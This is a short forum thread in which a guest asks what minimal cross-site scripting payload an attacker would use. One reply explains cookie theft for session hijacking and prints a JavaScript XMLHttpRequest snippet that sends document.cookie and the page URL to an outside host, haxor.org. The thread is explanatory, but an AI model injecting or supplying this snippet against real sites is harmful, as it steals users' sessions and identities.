Cross site scripting

G

Guest

This is not an ASP.NET question per se. I'm asking since a lot of smart
people lurk here.

What is the smallest script that would be useful to an attacker?
 
B

Brock Allen

XSS is typically used to steal cookies and send them to the attacker so they
can spoof your session or identity on the site it was stolen from. As for
the code, well, I'm not a h4X0r, so I don't know what else it'd be beyond:

var xmlRequest = new XMLHttpRequest();
xmlRequest.open("GET", "http://haxor.org?Cookie=" + document.cookie + "&URL="
+ document.url, false);
xmlRequest.send(null);

But this gives you the idea. Again, there are probabaly more clever/malicious
things that can be done.
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

Web Site 1
Site Migration Ruined all my CSS?? 8
NDS and GBA emulation server 0
Filter user entered Html for possible Cross Site Scripting attacks 0
How to code a site to give information about responses to questions? 8
Cross-Site Scripting basic sample 0
cross frame scripting 1
Outputting signal values to terminal Within Character Array 0

Members online

Total: 24 (members: 2, guests: 22)
Robots: 404

Forum statistics

Threads
473,755
Messages
2,569,536
Members
45,020
Latest member
GenesisGai

Latest Threads

Top